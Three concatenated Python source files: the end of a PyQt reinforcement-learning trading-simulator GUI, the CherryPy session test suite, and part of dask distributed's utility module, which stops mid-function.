self.ui = uic.loadUi("mainWindow.ui", self)
self.weight_path = None # folder containing the currently selected model  TODO: model file or folder?
self.info = ['없음','비실행중'] # [current model file, latest training/test status message]
self.portpolio_value_history = [] # history list populated by the training/test thread
self.setInfo("없음")
self.running = None
self.ui.show()
self.tradingList.addItems([ func['name'] for func in strategies]) # register the trading-algorithm menu entries
data_list = [ elem.name for elem in Path('../daily_data').iterdir() if elem.is_dir() ]
self.subjectList.addItems(data_list) # register the instrument-selection menu  TODO: the UI needs more flexibility for registering instruments
self.viewSubjectList.addItems(data_list) # register the indicator-selection menu  TODO: the UI needs more flexibility for registering instruments
self.selected_subject = [data_list[0], [data_list[0],]] # currently selected instrument (and its indicator list)
self.selected_trading = [] # currently selected trading strategies
self.selected_learn = 'ppo' # currently selected reinforcement-learning method, 'ppo' or 'dqn'
# set default selections
self.subjectList.itemAt(0,0).setSelected(True)
self.viewSubjectList.itemAt(0,0).setSelected(True)
def setInfo(self, file=None, msg=None):
# update the status message shown in the UI
baseText = "현재 로드된 모델 파일 : {}\n마지막 메시지\n: {}"
self.info[0] = file if not file is None else self.info[0]
self.info[1] = msg if not msg is None else self.info[1]
self.ui.modelInfoLabel.setText(baseText.format(*self.info))
# event slot implementations
@pyqtSlot()
def ppoSelect(self):
'''Event handler for selecting PPO.'''
self.selected_learn = 'ppo'
print("sel ppo")
@pyqtSlot()
def dqnSelect(self):
'''Event handler for selecting DQN.'''
self.selected_learn = 'dqn'
print("sel dqn")
@pyqtSlot()
def changedTrading(self):
'''Event handler for selecting one of the built-in algorithmic trading strategies.'''
self.selected_trading = strategies_name_filter([elem.text() for elem in self.tradingList.selectedItems()])
print(self.selected_trading)
@pyqtSlot()
def changedSubject(self):
'''Event handler for selecting the indicators the model uses and the instrument to trade.'''
self.selected_subject = [
self.subjectList.selectedItems()[0].text(),
[ elem.text() for elem in self.viewSubjectList.selectedItems() ],
]
print(self.selected_subject)
@pyqtSlot()
def selectModelPath(self):
self.weight_path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select Model Path')
print(self.weight_path)
if self.weight_path!= "":
dir_name = self.weight_path.split('/')[-1]
self.setInfo(file=dir_name)
else:
self.weight_path = None
self.setInfo(file="없음")
print(self.episodesTextBox.toPlainText())
@pyqtSlot()
def modelTraining(self):
if not self.running is None and self.running.is_alive():
return
self.portpolio_value_history = []
episodes_text : str = self.episodesTextBox.toPlainText()
if episodes_text.isnumeric():
episodes = int(episodes_text)
else:
episodes = 100
kwargs=dict(
mode='train',
episode=episodes,
window_size=30,
init_invest=100*10000,
model_path=self.weight_path,
addition_train=self.additionalCheckBox.isChecked(),
selected_learn=self.selected_learn,
selected_trading=self.selected_trading,
selected_subject=self.selected_subject,
ui_windows=self,
)
# run_program
self.running = threading.Thread(target=program, kwargs=kwargs)
self.running.daemon = True
self.running.start()
self.setInfo(msg='학습시작.')
@pyqtSlot()
def modelTest(self):
if not self.running is None and self.running.is_alive():
return
self.portpolio_value_history = []
if self.weight_path is None:
self.setInfo(msg="트레이딩을 하기 위해 학습된 모델을 로드해주세요.")
return
episodes_text : str = self.episodesTextBox.toPlainText()
if episodes_text.isnumeric():
episodes = int(episodes_text)
else:
episodes = 100
kwargs=dict(
mode='test',
episode=episodes,
window_size=30,
init_invest=100*10000,
model_path=self.weight_path,
addition_train=False,
selected_learn=self.selected_learn,
selected_trading=self.selected_trading,
selected_subject=self.selected_subject,
ui_windows=self,
)
# run_program
self.running = threading.Thread(target=program, kwargs=kwargs)
self.running.daemon = True
self.running.start()
self.setInfo(msg="가상트레이딩 시작.")
@pyqtSlot()
def showGraph(self):
print("portfolio", self.portpolio_value_history)
plt.plot(self.portpolio_value_history)
plt.ylabel("포트폴리오 가치")
plt.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = Form()
sys.exit(app.exec())
|
test_session.py
|
import os
import threading
import time
import socket
import pytest
import cherrypy
from cherrypy._cpcompat import (
copykeys, json_decode,
HTTPConnection, HTTPSConnection
)
from cherrypy.lib import sessions
from cherrypy.lib import reprconf
from cherrypy.lib.httputil import response_codes
from cherrypy.test import helper
localDir = os.path.dirname(__file__)
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ', '.join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
@cherrypy.config(**{
'tools.sessions.on': True,
'tools.sessions.storage_class': sessions.RamSession,
'tools.sessions.storage_path': localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
})
class Root:
@cherrypy.expose
def clear(self):
cherrypy.session.cache.clear()
@cherrypy.expose
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
@cherrypy.expose
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
@cherrypy.expose
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
@cherrypy.expose
@cherrypy.config(**{'tools.sessions.on': False})
def set_session_cls(self, new_cls_name):
new_cls = reprconf.attributes(new_cls_name)
cfg = {'tools.sessions.storage_class': new_cls}
self.__class__._cp_config.update(cfg)
if hasattr(cherrypy, 'session'):
del cherrypy.session
if new_cls.clean_thread:
new_cls.clean_thread.stop()
new_cls.clean_thread.unsubscribe()
del new_cls.clean_thread
@cherrypy.expose
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
@cherrypy.expose
def keyin(self, key):
return str(key in cherrypy.session)
@cherrypy.expose
def delete(self):
cherrypy.session.delete()
sessions.expire()
return 'done'
@cherrypy.expose
def delkey(self, key):
del cherrypy.session[key]
return 'OK'
@cherrypy.expose
def redir_target(self):
return self._cp_config['tools.sessions.storage_class'].__name__
@cherrypy.expose
def iredir(self):
raise cherrypy.InternalRedirect('/redir_target')
@cherrypy.expose
@cherrypy.config(**{
'tools.allow.on': True,
'tools.allow.methods': ['GET'],
})
def restricted(self):
return cherrypy.request.method
@cherrypy.expose
def regen(self):
cherrypy.tools.sessions.regenerate()
return 'logged in'
@cherrypy.expose
def length(self):
return str(len(cherrypy.session))
@cherrypy.expose
@cherrypy.config(**{
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False,
})
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
cherrypy.tree.mount(Root())
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
@pytest.mark.xfail(reason='#1534')
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertDictEqual(json_decode(self.body),
{'counter': 3, 'aha': 'foo'})
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody('done')
self.getPage('/delete', cookieset1)
self.assertBody('done')
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self._test_Concurrency()
@pytest.mark.xfail(reason='#1306')
def test_2_File_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('FileSession')
@pytest.mark.xfail(reason='#1540')
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
path = os.path.join(localDir, 'session-' + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/testStr',
headers=[
('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()),
set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail('The second session did not time out.')
else:
self.fail('Unknown session id in cache: %r', cache)
def test_8_Ram_Cleanup(self):
def lock():
s1 = sessions.RamSession()
s1.acquire_lock()
time.sleep(1)
s1.release_lock()
t = threading.Thread(target=lock)
t.start()
start = time.time()
while not sessions.RamSession.locks and time.time() - start < 5:
time.sleep(0.01)
assert len(sessions.RamSession.locks) == 1, 'Lock not acquired'
s2 = sessions.RamSession()
s2.clean_up()
assert len(sessions.RamSession.locks) == 1, 'Clean up should not remove active lock'
t.join()
try:
import memcache # NOQA
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip('memcached not reachable ')
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.MemcachedSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody('NotImplementedError')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody('done')
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage('/', cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('memcached')
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(
404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = '__no_default__'
def _initialize_mp_context():
if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
method = dask.config.get('distributed.worker.multiprocessing-method')
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ['distributed']
if 'pkg_resources' in sys.modules:
preload.append('pkg_resources')
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, 'func'):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn("Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s"
% (host, default, e), RuntimeWarning)
return default
finally:
sock.close()
def get_ip(host='8.8.8.8', port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default='127.0.0.1')
def get_ipv6(host='2001:4860:4860::8888', port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default='::1')
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
raise gen.Return(results)
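# Illustrative sketch (not part of the original module): gathering a handful of
# coroutines with All(); the helper coroutine below is hypothetical.
@gen.coroutine
def _all_example():
    @gen.coroutine
    def work(i):
        yield gen.moment
        raise gen.Return(i * 2)
    results = yield All([work(i) for i in range(3)])
    raise gen.Return(results)               # -> [0, 2, 4]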
@gen.coroutine
def Any(args, quiet_exceptions=()):
""" Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
(hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if (self._asynchronous or real_runner is not None or count > 0):
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(start_exc[0], Exception): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with ignoring(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
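# Illustrative sketch (not part of the original module): typical LoopRunner use
# from synchronous code -- start a background IO loop, run a coroutine on it
# with run_sync(), then stop the loop. The coroutine below is hypothetical.
def _loop_runner_example():
    runner = LoopRunner()                   # owns a fresh IOLoop
    runner.start()                          # the loop now runs in a daemon thread
    try:
        @gen.coroutine
        def add(a, b):
            yield gen.moment                # pretend to do asynchronous work
            raise gen.Return(a + b)
        return runner.run_sync(add, 1, 2)   # blocks until the coroutine finishes
    finally:
        runner.stop()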
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, 'w') as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if 'IPython' not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split('-')
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (len(word) == 8 and
hex_pattern.match(word) is not None):
result += '-' + word
else:
break
if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
return 'data'
else:
if result[0] == '<':
result = result.strip('<>').split()[0].split('.')[-1]
return result
except Exception:
return 'Other'
try:
from functools import lru_cache
except ImportError:
lru_cache = False
pass
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return 'Other'
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
else:
return 'Other'
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
